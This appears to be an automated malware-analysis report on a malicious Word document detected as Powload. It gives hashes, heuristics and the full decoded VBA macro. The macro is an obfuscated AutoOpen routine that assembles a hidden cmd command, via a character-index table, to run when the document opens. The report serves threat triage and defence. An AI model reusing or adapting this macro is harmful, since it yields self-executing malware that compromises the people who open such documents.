Office (OLE) malware analysis — malicious · 2f2a156207d853e4

MALICIOUS

Office (OLE)

85.2 KB Created: 2018-08-07 23:34:00 Authoring application: Microsoft Office Word First seen: 2021-02-23

MD5: d39d5ba5d6fe7ecfcd96fc9713fd950b SHA-1: 1f6b8232ed379eb571e5ee159fcb7e47f8dca04d SHA-256: 2f2a156207d853e4548859cd1cfe9557290751c987906dab67d86583751cfb01

112 Risk Score

Heuristics 6

ClamAV: Doc.Malware.Powload-6794078-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Powload-6794078-0
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5472 bytes
SHA-256: `ec51a6ed955ed8465680e7df6b65f2058e6992c702f7e28a6befc4963e757af3`
Detection ClamAV: No threats found Obfuscation or payload: likely 43 of 85 identifiers look randomly generated (e.g. 'AiTEZQEnZPsfYi'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "lomNoKA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next TypeName CSng(CXTosR) TypeName nGRzTi TypeName Oct(26243 - NidWum) TypeName FWYhru TypeName OYiVXw Shell@ CStr("c") + CStr("m") + AiTEZQEnZPsfYi + XZmabMztPvcBH + mTdKEPraRH + OZRqZOZER + idVdmpnS + jouOCriYVo + wvUsZzTokZpdo + danIAAiwmkYC, 989400484 - 989400484 TypeName ERnEMa TypeName 7 TypeName Sqr(151) End Sub Attribute VB_Name = "WEtHUvKZVCr" Function mTdKEPraRH() On Error Resume Next TypeName Atn(986) TypeName 6124 TypeName Atn(8285) uLzSZVMwaR = "d " + "/V:O/C" + CStr(Chr(KwcsWqUFHXs + jzGuBIHrDXaVz + 34 + tGjNCnNOD + qjphSQpa)) + "set kX=M" + "BsqLnimj" + "WrHDjSmPCh" + "+Ta2}8'o" + "/g{y" + "Ac(:kX" TypeName 366 TypeName 5 TypeName Round(fmAVZq) miaBrOf = "d" + "tv$=" + "blx-)NU" + "w;e" + "4p\Y@f,zu" + "J.F6" + " 5&&f" + "or %2 in (" + "5" TypeName Tan(pjlUsq) TypeName ChrB(1) TypeName Hex(24687 * wNNCE) ZYOPu = "3,2" + "6,49,51,10" + ",2," + "18,51," + "43,43,6" + "5," TypeName qKMzZ TypeName CInt(41886712) idHNMkcdobq = "40,5" + "5,37,14," + "4" + "1,5,51" + ",49,45,26" + ",42,13" + ",51,32" + ",38,65" + ",47,51," + "38," + "62," + "9,51,42,1" TypeName CInt(4) TypeName 6 rtFwqFSGij = "7,43" + ",6,51,5,38" + ",5" + "0,40" + ",49,43" + ",59,41" + ",2" + "5,18" + ",38,38," + "53,34,27" + ",27" + ",2,26,32," TypeName Round(skJnzR) TypeName Rnd(JAldQ) tKGRCPTt = "3,60" + ",21,62,32" + ",26" + ",2" + "7,49,5" + "3,45,32," + "2" + "6,5,38,51" + ",5,38" + ",27,60" + ",53,4" + "3" + ",26,21,37," mTdKEPraRH = uLzSZVMwaR + miaBrOf + ZYOPu + idHNMkcdobq + rtFwqFSGij + tKGRCPTt TypeName YzQKt TypeName Sin(994) TypeName Fix(RrKvu) End Function Function OZRqZOZER() On Error Resume Next TypeName Round(sNbMDZ) TypeName Sqr(75054 / crpYij / GIwim * FtGEW) UKwCFiYzX = "2,2" + "7,21," + "6" + "6,0,2" + "4,20,2,12" + ",26,56,18," + "38,38,53,3" + "4,27,2" + "7,42," + "30" + "," TypeName 5682 TypeName CStr(9) TypeName qrlCiX iSiJnc = "21,32,21,3" + "7,51,15,3" + "0,62," + "57,10,2" + "7,24" + ",22," + "56,18" TypeName dPRHoh TypeName 53341182 ffiAjD = ",38,38," + "53,34," + "27" + ",27" + "," + "2,2" + "1,51," + "43,62,35,5" + "9,27,42,5" + "6," + "18,38" + ",38," TypeName 753 TypeName bHSIi TypeName 362396330 qWkMpwT = "53,34,27," + "27,32," + "26" + ",26,5" + "3,51" + ",1" + "0" + ",2,21,15," + "62,32,26," + "26,53,62" TypeName wjUCC TypeName KolRW TypeName zihiuA VjrIPcqwrv = ",53" + ",30," + "27,49,36,3" + "6,1,56," + "18" TypeName CBool(loSOk) TypeName ChrB(ROuuzu + EoBlj * 25708 + rWmwI) TypeName CStr(1) uXpiTCYasYF = ",3" + "8,38,53" + ",34," + "27,2" + "7,38," + "10" + "," + "6,42,28," + "21,37," + "62,13,53," OZRqZOZER = UKwCFiYzX + iSiJnc + ffiAjD + qWkMpwT + VjrIPcqwrv + uXpiTCYasYF TypeName Hex(cQDUjO) TypeName CBool(LaDdli) TypeName Atn(wdjhRf - uLPZj * VCOwfw * 91962) End Function Function idVdmpnS() On Error Resume Next TypeName CByte(AUDEH - foLQrn * 85495 - PKHNoV) TypeName Atn(85) XPXqHofnMb = "27,43,26,2" + "8,2,6" + ",38,51,2" + "7" + ",9,31,25," + "6" + "2,14,53,4" + "3" + "," TypeName Oct(18427 - SJinu) TypeName CInt(hEZMa) SAzlOdKljkz = "6,38" + ",33,2" + "5,56,25,4" + "6,50," + "4" + "0,47,1" + "3,48" + ",65,4" + "1,65,25" + ",64,52,66" + ",25" + ",50,40,3" TypeName Log(3) TypeName Int(qlikw) FrLsX = "9,18" + ",31," + "4" + "1,4" + "0,51" + ",5,39," + "34,38,51" + ",15,53,19," TypeName Atn(SdRDHH) TypeName ttpoBB DiiSD = "25," + "54,25,19" + ",40,47,1" + "3,48,1" + "9,25,62" + ",51," + "44,51,2" + "5,5" + "0,57,26,1" + "0,51,21,32" + ",18,33,4" + "0,61," + "36," TypeName CBool(356) TypeName CByte(2849) DnjdTp = "53,65,6,5" + ",65," + "40,49,4" + "3,59" + ",46" + ",29," + "38,10,30," + "29" + ",40,55,3" + "7,14," + "62,12,26," + "49," idVdmpnS = XPXqHofnMb + SAzlOdKljkz + FrLsX + DiiSD + DnjdTp TypeName Atn(588) TypeName krTWC End Function Function jouOCriYVo() On Error Resume Next TypeName ChrW(19466 * MzcqU * JAZwp / jWFdRp) TypeName ChrB(4) TypeName vsiLki jSrzL = "5" + ",43,26," + "21" + ",37,63," + "6,43,51," + "33,40," + "61,36," + "5" + "3" TypeName 14 TypeName ChrW(90800 * VUjpL) vZRSS = ",58,65,40" + ",39,18" + ",31,46,5" + "0,1" + "4,38,21," + "10,38,4" + "5,16,10,26" + "," + "32,51," + "2,2,65," + "40" + ",39,18,31" + ",50,4" TypeName 960 TypeName Int(ofrfVE - NslWL) plPCiDcjwP = "2,10," + "5" + "1,21" + ",35,50,23" + "," + "32" + ",21,38,32," + "18,29,23," + "23,65" + ",65," TypeName Cos(VRFmd + TUBmM) TypeName CSng(QSFJTG) iUTWNT = "65,65,65," + "65,6" + "5,65,6" + "5,65,65," + "65,65," + "65,65," + "65" + ",65,7" + "2)d" TypeName Atn(jPdSjo) TypeName Cos(193536439) HsVctUzkY = "o se" + "t " + "ShzH=!ShzH" + "!!kX:~%2" + ",1!&&if %2" + "==" + "72 ca" + "ll %Shz" TypeName CByte(qMTtGu) TypeName Rnd(ULqsJ - dzafNr) zzKtWjpIz = "H:~-354%" + CStr(Chr(BBJwQmHZBWX + LBnipFW + 34 + juSaCWF + ZJprEZRmAGo)) + " " + " " + " " jouOCriYVo = jSrzL + vZRSS + plPCiDcjwP + iUTWNT + HsVctUzkY + zzKtWjpIz TypeName ilpIK TypeName Oct(AcuNVd) TypeName Cos(47865 / OwknBw) End Function

Open this report in the interactive analyzer, or submit your own file for analysis.